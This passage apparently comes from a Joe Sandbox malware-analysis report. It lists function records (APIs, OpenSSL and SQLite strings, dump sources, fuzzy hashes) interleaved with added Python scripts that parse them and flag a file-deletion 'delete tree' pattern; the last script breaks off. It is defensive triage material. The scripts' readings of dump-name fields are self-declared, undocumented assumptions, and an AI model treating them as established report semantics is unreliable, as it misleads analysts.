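    return [a["func"] for a in sorted(rec["apis"], key=lambda a: a["ref"])]


DELETE_TREE_APIS = {"FindFirstFileW", "FindNextFileW", "FindClose", "DeleteFileW", "RemoveDirectoryW"}


def looks_like_delete_tree(rec: Dict) -> bool:
    """Heuristic: wildcard enumeration plus file delete and directory removal in one function."""
    return DELETE_TREE_APIS <= set(api_sequence(rec)) and "\\*" in rec["string_id"]


def region_rva(rec: Dict) -> Optional[int]:
    """Assumption: 4th dot-separated field of the dump name is the region VA; subtract the module base."""
    if not rec["source_file"] or rec["module_base"] is None:
        return None
    return int(rec["source_file"].split(".")[3], 16) - rec["module_base"]


def index_by_opcode_id(records: List[Dict]) -> Dict[str, List[Dict]]:
    """Pivot table: Opcode ID -> records, so a hash from another report can be looked up directly."""
    idx: Dict[str, List[Dict]] = {}
    for r in records:
        idx.setdefault(r["opcode_id"], []).append(r)
    return idx


def group_by_module(records: List[Dict]) -> Dict[int, List[str]]:
    """Module base address -> Opcode IDs of the functions dumped from that module."""
    out: Dict[int, List[str]] = {}
    for r in records:
        out.setdefault(r["module_base"], []).append(r["opcode_id"])
    return out


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(hex(r["module_base"]), r["opcode_id"][:16], api_sequence(r), looks_like_delete_tree(r))
```

To use it on a full report, paste the function listing into a file and feed its contents to `parse_records`; `index_by_opcode_id` is what you would run across several reports to find the same cleanup or SQLite routine in other samples, while `api_sequence` gives the call order without having to open the snapshot in IDA.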
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID:
• String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
• API String ID: 0-2031831958
• Opcode ID: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
• Instruction ID: 69bb21e3e9fc613ceed0b2a17469c1c75fea8b9000e91a5f4957c4f933bdfc9f
• Opcode Fuzzy Hash: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
• Instruction Fuzzy Hash: EDD12662B1D68286EB668B59D064B7D7BE5FB44B80F4B4078DE8E4B7A5DE2CE400C700
APIs
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
• Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
• Instruction ID: 93c3ade5e0df77667ce2df2b49974f6325261674f4316561062131f68acb318c
• Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
• Instruction Fuzzy Hash: 9A31DB76609A868AEB609F61E8407EE7374FB88744F44443ADB4E47BA9DF3CD648C710
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction ID: a34d1c2bd872d6ac2a92cb46ed2bb1fcc56650d32559f5c199ae5cbcbeb2ab7c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4231FA73609B8586EB609F64E8807AE6374FB84748F44403ADB4E87BA9EF79D548C710
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525C45
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7525598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255AC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: HeapFree.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6B751A8DF,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751A909
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6B751A8DF,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751A92E
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525C34
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B75255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B752560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EAA
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EBB
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525ECC
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                                              • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                              • Instruction ID: 95f0c04069e4de3d30322c73e55e1f1e83f292b0eeba1eaea1bfc8591df2b883
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1D1AE37F1C25286E7209F2AD8811B96761EF84794F448136EB4EC7AB5EF3CE8518740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction ID: 6b311e013661d88019044c8d22ac4984071de2e1b38d022f686d164072ab9c7d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52313D3761CB8186DB608F29E8402AE73A4FB88758F540139EB9D83BA5EF38D555CB00
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                                              • API String ID: 0-1194634662
                                                                                                                                                                                                                                              • Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                              • Instruction ID: f997f149aa84e96b7a774a2fb3f15b3d23fb55bfb8fb4152f15a769ba805ea96
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFD17E21B0E68281EB14AB65D8547B967A0FB85B84F4C4036EF8D4BBAEDE3DE541C710
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                                              • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                              • Instruction ID: e0dc1134c1ede4e01cd5a65e05e741f536f6f00a3cfd438340bcb22d5fea85c2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CB1B423B1C69241EA61DF2A99002BA63A1EF44BE4F545131EF5D9BBE5EF3CE841C300
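Every function record in this part of the report follows one fixed layout: an APIs and/or Strings block, the Memory Dump Source whose "Offset" is the module base, the IDA plugin snapshot name, and a Similarity block that ends with the Instruction Fuzzy Hash. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that layout as rendered on this page, separates the APIs a function calls directly from those the report attributes to its subcalls, and buckets functions by module base, so the image at 00007FF6B7500000 (program.exe) can be looked at apart from the second module at 00007FFE00760000 whose String ID points at ssl\statem\statem_srvr.c. The sample input is constructed from two records on this page, abridged; the regular expressions assume exactly the bullet and key names shown here.

```python
"""Parse this report's per-function records (layout as rendered here); added example, not the report's own."""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
BULLET_RE = re.compile(r"^•\s*(.*)$")        # every record line starts with a bullet
KEY_RE = re.compile(r"^([^:]+):\s*(.*)$")    # "Key: value"
SOURCE_RE = re.compile(r"^(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+)")
# "Name.MODULE(...) ref: ..." entries, optionally prefixed "Part of subcall function <addr>:"
API_CALL_RE = re.compile(r"^(Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_]\w*)\.(\w+)")


@dataclass
class FunctionRecord:
    api_calls: list[str] = field(default_factory=list)     # direct calls, "Name.MODULE"
    subcall_apis: list[str] = field(default_factory=list)  # calls reached through subcalls
    source_file: str = ""                                  # .sdmp the function was lifted from
    module_base: str = ""                                  # the "Offset:" value, i.e. module base
    associated: list[str] = field(default_factory=list)    # other .sdmp files of that module
    fields: dict[str, str] = field(default_factory=dict)   # Snapshot File, API ID, hashes, ...


def parse_records(text: str) -> list[FunctionRecord]:
    """Headers switch context; a record ends at its 'Instruction Fuzzy Hash' line."""
    records: list[FunctionRecord] = []
    current, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()                   # drop the extraction indentation
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        bullet = BULLET_RE.match(line)
        if not bullet:
            continue                         # not a record line; ignore
        body = bullet.group(1)
        if section == "APIs":
            call = API_CALL_RE.match(body)
            if call:
                name = f"{call.group(2)}.{call.group(3)}"
                (current.subcall_apis if call.group(1) else current.api_calls).append(name)
            continue
        kv = KEY_RE.match(body)
        if not kv:
            continue
        key, value = kv.group(1).strip(), kv.group(2).strip()
        if section == "Memory Dump Source":
            src = SOURCE_RE.match(value)
            if key == "Source File" and src:
                current.source_file, current.module_base = src.group(1), src.group(2).upper()
            elif key == "Associated":
                current.associated.append(value)
            continue
        current.fields[key] = value
        if key == "Instruction Fuzzy Hash":  # last line of every record
            records.append(current)
            current = FunctionRecord()
    return records


def group_by_module(records: list[FunctionRecord]) -> dict[str, list[FunctionRecord]]:
    """Bucket functions by the module base they were dumped from."""
    groups: dict[str, list[FunctionRecord]] = defaultdict(list)
    for rec in records:
        groups[rec.module_base].append(rec)
    return dict(groups)


# Constructed sample: two records copied from this report, abridged (argument lists
# shortened, Opcode/Instruction ID lines and "Download File" link text dropped).
SAMPLE = r"""
APIs
• _get_daylight.LIBCMT ref: 00007FF6B7525C45
  • Part of subcall function 00007FF6B751A948: HeapFree.KERNEL32(?,?,?,00007FF6B7522D22), ref: 00007FF6B751A95E
  • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22), ref: 00007FF6B751A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
• Instruction Fuzzy Hash: B1D1AE37F1C25286E7209F2AD8811B96761EF84794F448136EB4EC7AB5EF3CE8518740
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID:
• String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
• API String ID: 0-1194634662
• Instruction Fuzzy Hash: EFD17E21B0E68281EB14AB65D8547B967A0FB85B84F4C4036EF8D4BBAEDE3DE541C710
"""

if __name__ == "__main__":
    for base, funcs in group_by_module(parse_records(SAMPLE)).items():
        apis = sorted({a for f in funcs for a in f.api_calls + f.subcall_apis})
        print(f"module @ {base}: {len(funcs)} function(s), APIs: {apis}")
```

Fed the text of the whole report instead of SAMPLE, the same code yields, per module base, the set of Windows APIs the report attributes to that module's functions; the Similarity values stay in `fields`, so the records can equally be keyed on "API String ID" or "Opcode Fuzzy Hash" to find functions the report describes identically.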
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
• Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
• API String ID: 3568877910-3130753023
• Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
• Instruction ID: 6c549e20a35669ffae189c731095f5df337004ead705dc4098add03d466f91af
• Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
• Instruction Fuzzy Hash: D112B562A0EA8281FB61BB65D4543BD67A1FF81784F488032DF8D57BADDE7CE9418700
APIs
• _get_daylight.LIBCMT ref: 00007FF6B7525EAA
  • Part of subcall function 00007FF6B75255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B752560C
• _get_daylight.LIBCMT ref: 00007FF6B7525EBB
  • Part of subcall function 00007FF6B7525598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255AC
• _get_daylight.LIBCMT ref: 00007FF6B7525ECC
  • Part of subcall function 00007FF6B75255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255DC
  • Part of subcall function 00007FF6B751A948: HeapFree.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
  • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
• Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
• Instruction ID: c97ae06fdf2f689c01fc93bfbba8d2e3fb59e61bf1d702adbaa5a3a2cea08dfb
• Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
• Instruction Fuzzy Hash: FC514C33A1C64286E720DF29D8815B97761FB88794F414136EB4EC7AB6DF3CE4518740
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID:
• String ID: $recovered %d frames from WAL file %s
• API String ID: 0-3175670447
• Opcode ID: e5641cb21486a6acf6a1fe0ade8eb86be90981cbbdf825e132ca60860199bf83
• Instruction ID: c6f3bbad9e7c62c9e0c727fac651ed0132b329f2bd5091d2040c6fa6bcb43c97
• Opcode Fuzzy Hash: e5641cb21486a6acf6a1fe0ade8eb86be90981cbbdf825e132ca60860199bf83
• Instruction Fuzzy Hash: 66F18E36A08786CAE7649F25E08076E77A1F784B98F025135DE5D8BBA8DF7CD844CB40
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
• Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
• API String ID: 3568877910-446233508
• Opcode ID: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
• Instruction ID: c8ecf4e572a5d1acf18f77e8536214048f5034be0b7d2db2cc7e4ca5478d5127
• Opcode Fuzzy Hash: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
• Instruction Fuzzy Hash: 6AD163A1B0E68381FA60BA22D5507BA5295EF84BC4F5C0031DF4E47BAEDF3DE6818751
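As an added triage example (this is not Joe Sandbox code and not the IDA plugin the records mention), the script below parses the "Memory Dump Source" and API lines of records like the ones above: it splits each .sdmp name into its dotted fields, decodes the fifth field as a Windows PAGE_* protection constant, attributes every API call-site address ("ref:") to the module with the nearest image base at or below it, and lists the dumps recorded as both executable and writable. The field layout of the .sdmp name, the reading of its fifth field as a page protection, and the nearest-base attribution rule are assumptions of this example that the report itself does not document; the SAMPLE text is constructed in the shape of the lines above, with the "Download File" link residue left in so the parser copes with raw report text.

```python
"""Triage helper for Joe Sandbox function records (added example, not Joe Sandbox code).

Assumptions not documented on the page:
- an .sdmp name is <proc>.<round>.<dump-id>.<address>.<protection>.<f6>.<f7>.<f8>.sdmp
- the fifth field is the Windows PAGE_* memory protection of the dumped region
- an API "ref" address belongs to the module with the nearest image base at or below it
"""
import re
from collections import defaultdict

# Windows page-protection constants from winnt.h; mapping the .sdmp field onto
# them is this example's assumption.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
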